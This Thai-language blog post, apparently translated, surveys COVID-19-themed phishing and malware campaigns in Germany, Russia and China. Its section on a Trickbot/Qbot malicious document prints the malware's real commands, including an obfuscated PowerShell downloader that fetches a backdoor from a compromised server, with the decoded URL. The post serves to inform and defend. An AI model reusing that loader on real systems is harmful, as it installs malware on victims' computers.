โปรโฮสต์ > บล็อก > การบริหาร > การโจมตีทางไซเบอร์ของไวรัสโคโรนา: ประเด็นทั้งหมดอยู่ที่วิศวกรรมสังคม

การโจมตีทางไซเบอร์ของไวรัสโคโรนา: ประเด็นทั้งหมดอยู่ที่วิศวกรรมสังคม

ผู้โจมตียังคงใช้ประโยชน์จากหัวข้อเรื่องโควิด-19 โดยสร้างภัยคุกคามสำหรับผู้ใช้ที่สนใจทุกสิ่งที่เกี่ยวข้องกับโรคระบาดมากขึ้นเรื่อยๆ ใน โพสต์ล่าสุด เราได้พูดคุยกันแล้วเกี่ยวกับประเภทของมัลแวร์ที่ปรากฏขึ้นหลังจากไวรัสโคโรนา และวันนี้เราจะพูดถึงเทคนิควิศวกรรมสังคมที่ผู้ใช้ในประเทศต่างๆ รวมถึงรัสเซีย ได้พบเจอแล้ว แนวโน้มและตัวอย่างทั่วไปอยู่ระหว่างการแก้ไข

การโจมตีทางไซเบอร์ของไวรัสโคโรนา: ประเด็นทั้งหมดอยู่ที่วิศวกรรมสังคม

จำเข้าไว้. ครั้งสุดท้าย เราได้พูดคุยเกี่ยวกับความจริงที่ว่าผู้คนเต็มใจที่จะอ่านไม่เพียงแต่เกี่ยวกับโคโรน่าไวรัสและแนวทางของการแพร่ระบาด แต่ยังรวมถึงมาตรการสนับสนุนทางการเงินด้วย นี่เป็นตัวอย่างที่ดี การโจมตีแบบฟิชชิ่งที่น่าสนใจถูกค้นพบในรัฐนอร์ดไรน์-เวสต์ฟาเลียหรือ NRW ของเยอรมนี คนร้ายสร้างสำเนาเว็บไซต์กระทรวงเศรษฐกิจ (NRW กระทรวงเศรษฐกิจ) ซึ่งใครๆ ก็สามารถขอความช่วยเหลือทางการเงินได้ โปรแกรมดังกล่าวมีอยู่จริง และกลายเป็นว่าเป็นประโยชน์สำหรับผู้หลอกลวง เมื่อได้รับข้อมูลส่วนบุคคลของเหยื่อแล้ว พวกเขาจึงได้ยื่นคำร้องบนเว็บไซต์กระทรวงจริง แต่ระบุรายละเอียดธนาคารอื่น ๆ ตามข้อมูลอย่างเป็นทางการ มีการร้องขอปลอมดังกล่าวถึง 4 รายการจนกระทั่งพบโครงการดังกล่าว เป็นผลให้เงินจำนวน 109 ล้านดอลลาร์ที่มีไว้สำหรับประชาชนที่ได้รับผลกระทบตกไปอยู่ในมือของผู้ฉ้อโกง

การโจมตีทางไซเบอร์ของไวรัสโคโรนา: ประเด็นทั้งหมดอยู่ที่วิศวกรรมสังคม

คุณต้องการตรวจเชื้อ COVID-19 ฟรีหรือไม่?

อีกตัวอย่างที่สำคัญของฟิชชิ่งที่มีธีมเกี่ยวกับไวรัสโคโรนาก็คือ ค้นพบ ในอีเมล ข้อความดังกล่าวดึงดูดความสนใจของผู้ใช้ด้วยข้อเสนอให้เข้ารับการทดสอบการติดเชื้อโคโรนาไวรัสฟรี ในสิ่งที่แนบมานี้ ตัวอักษร มีอินสแตนซ์ของ Trickbot/Qakbot/Qbot และเมื่อผู้ที่ต้องการตรวจสุขภาพเริ่ม “กรอกแบบฟอร์มที่แนบมาด้วย” สคริปต์ที่เป็นอันตรายก็ถูกดาวน์โหลดลงในคอมพิวเตอร์ และเพื่อหลีกเลี่ยงการทดสอบแซนด์บ็อกซ์ สคริปต์จึงเริ่มดาวน์โหลดไวรัสหลักหลังจากผ่านไประยะหนึ่งเท่านั้น เมื่อระบบป้องกันมั่นใจว่าจะไม่มีกิจกรรมที่เป็นอันตรายเกิดขึ้น

การโน้มน้าวให้ผู้ใช้ส่วนใหญ่เปิดใช้งานมาโครก็เป็นเรื่องง่ายเช่นกัน ในการดำเนินการนี้ มีการใช้เคล็ดลับมาตรฐาน: ในการกรอกแบบสอบถาม คุณต้องเปิดใช้งานมาโครก่อน ซึ่งหมายความว่าคุณต้องเรียกใช้สคริปต์ VBA

การโจมตีทางไซเบอร์ของไวรัสโคโรนา: ประเด็นทั้งหมดอยู่ที่วิศวกรรมสังคม

อย่างที่คุณเห็นสคริปต์ VBA ได้รับการปกปิดเป็นพิเศษจากโปรแกรมป้องกันไวรัส

การโจมตีทางไซเบอร์ของไวรัสโคโรนา: ประเด็นทั้งหมดอยู่ที่วิศวกรรมสังคม

Windows มีคุณลักษณะการรอที่แอปพลิเคชันรอ /T <วินาที> ก่อนที่จะยอมรับคำตอบเริ่มต้น "ใช่" ในกรณีของเรา สคริปต์รอ 65 วินาทีก่อนที่จะลบไฟล์ชั่วคราว:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

และระหว่างรอก็มีการดาวน์โหลดมัลแวร์ มีการเปิดตัวสคริปต์ PowerShell พิเศษสำหรับสิ่งนี้:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

หลังจากถอดรหัสค่า Base64 แล้ว สคริปต์ PowerShell จะดาวน์โหลดแบ็คดอร์ที่อยู่บนเว็บเซิร์ฟเวอร์ที่ถูกแฮ็กก่อนหน้านี้จากเยอรมนี:

http://automatischer-staubsauger.com/feature/777777.png

และบันทึกไว้ในชื่อ:

C:UsersPublictmpdirfile1.exe

โฟลเดอร์ ‘C:UsersPublictmpdir’ ถูกลบเมื่อรันไฟล์ 'tmps1.bat' ที่มีคำสั่ง cmd /c mkdir ""C:UsersPublictmpdir"".

โจมตีหน่วยงานของรัฐแบบกำหนดเป้าหมาย

นอกจากนี้ นักวิเคราะห์ของ FireEye ยังรายงานเมื่อเร็วๆ นี้ว่าการโจมตี APT32 แบบกำหนดเป้าหมายซึ่งมุ่งเป้าไปที่โครงสร้างของรัฐบาลในหวู่ฮั่น รวมถึงกระทรวงการจัดการเหตุฉุกเฉินของจีน RTF ที่แจกจ่ายรายการหนึ่งมีลิงก์ไปยังบทความของ New York Times ที่มีชื่อว่า การอัปเดตสดของไวรัสโคโรนา: จีนกำลังติดตามนักเดินทางจากหูเป่ย. อย่างไรก็ตาม เมื่ออ่านแล้ว มีการดาวน์โหลดมัลแวร์ (นักวิเคราะห์ FireEye ระบุว่าอินสแตนซ์ดังกล่าวเป็น METALJACK)

ที่น่าสนใจ ณ เวลาที่ตรวจพบ ไม่มีโปรแกรมป้องกันไวรัสตัวใดตรวจพบอินสแตนซ์นี้ ตามข้อมูลของ Virustotal

การโจมตีทางไซเบอร์ของไวรัสโคโรนา: ประเด็นทั้งหมดอยู่ที่วิศวกรรมสังคม

เมื่อเว็บไซต์ทางการล่ม

ตัวอย่างการโจมตีแบบฟิชชิ่งที่โดดเด่นที่สุดเกิดขึ้นในรัสเซียเมื่อวันก่อน เหตุผลก็คือการแต่งตั้งผลประโยชน์ที่รอคอยมานานสำหรับเด็กอายุ 3 ถึง 16 ปี เมื่อมีการประกาศเริ่มรับสมัครในวันที่ 12 พฤษภาคม 2020 ผู้คนหลายล้านคนต่างรีบไปที่เว็บไซต์บริการของรัฐเพื่อขอความช่วยเหลือที่รอคอยมานาน และทำให้พอร์ทัลพังลงไม่เลวร้ายไปกว่าการโจมตี DDoS ระดับมืออาชีพ เมื่อประธานาธิบดีกล่าวว่า “หน่วยงานของรัฐไม่สามารถรับมือกับกระแสของการสมัครได้” ผู้คนเริ่มพูดคุยทางออนไลน์เกี่ยวกับการเปิดตัวเว็บไซต์ทางเลือกในการรับใบสมัคร

การโจมตีทางไซเบอร์ของไวรัสโคโรนา: ประเด็นทั้งหมดอยู่ที่วิศวกรรมสังคม

ปัญหาคือหลายไซต์เริ่มทำงานพร้อมกัน และในขณะที่ไซต์หนึ่งซึ่งเป็นไซต์จริงที่ posobie16.gosuslugi.ru ยอมรับแอปพลิเคชันจริง ๆ มากกว่า นับสิบรวบรวมข้อมูลส่วนบุคคลของผู้ใช้ใจง่าย.

เพื่อนร่วมงานจาก SearchInform พบโดเมนหลอกลวงใหม่ประมาณ 30 โดเมนในโซน .ru Infosecurity และ Softline Company ได้ติดตามเว็บไซต์บริการของรัฐบาลปลอมที่คล้ายกันมากกว่า 70 แห่งตั้งแต่ต้นเดือนเมษายน ผู้สร้างของพวกเขาดัดแปลงสัญลักษณ์ที่คุ้นเคย และยังใช้การผสมคำว่า gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie และอื่นๆ

วิศวกรรมการโฆษณาและสังคม

ตัวอย่างทั้งหมดนี้ยืนยันว่าผู้โจมตีสร้างรายได้จากหัวข้อไวรัสโคโรนาได้สำเร็จ และยิ่งความตึงเครียดทางสังคมสูงขึ้นและปัญหาที่ไม่ชัดเจนก็ยิ่งมีโอกาสมากขึ้นที่นักต้มตุ๋นจะต้องขโมยข้อมูลสำคัญ บังคับให้ผู้คนยอมสละเงินด้วยตัวเอง หรือเพียงแค่แฮ็กคอมพิวเตอร์มากขึ้น

และเนื่องจากการแพร่ระบาดได้ส่งผลให้ผู้ที่ไม่ได้เตรียมตัวต้องทำงานจากที่บ้านเป็นจำนวนมาก ไม่เพียงแต่เรื่องส่วนตัวเท่านั้น แต่ยังรวมไปถึงข้อมูลขององค์กรที่ตกอยู่ในความเสี่ยงด้วย ตัวอย่างเช่น เมื่อเร็วๆ นี้ ผู้ใช้ Microsoft 365 (เดิมคือ Office 365) ก็ถูกโจมตีแบบฟิชชิ่งเช่นกัน ผู้คนได้รับข้อความเสียง "พลาด" จำนวนมากเป็นไฟล์แนบไปกับจดหมาย อย่างไรก็ตาม ไฟล์เหล่านี้จริงๆ แล้วเป็นหน้า HTML ที่ส่งเหยื่อของการโจมตีไปให้ หน้าลงชื่อเข้าใช้ Microsoft 365 ปลอม. เป็นผลให้สูญเสียการเข้าถึงและประนีประนอมข้อมูลทั้งหมดจากบัญชี

ที่มา: will.com

เพิ่มความคิดเห็น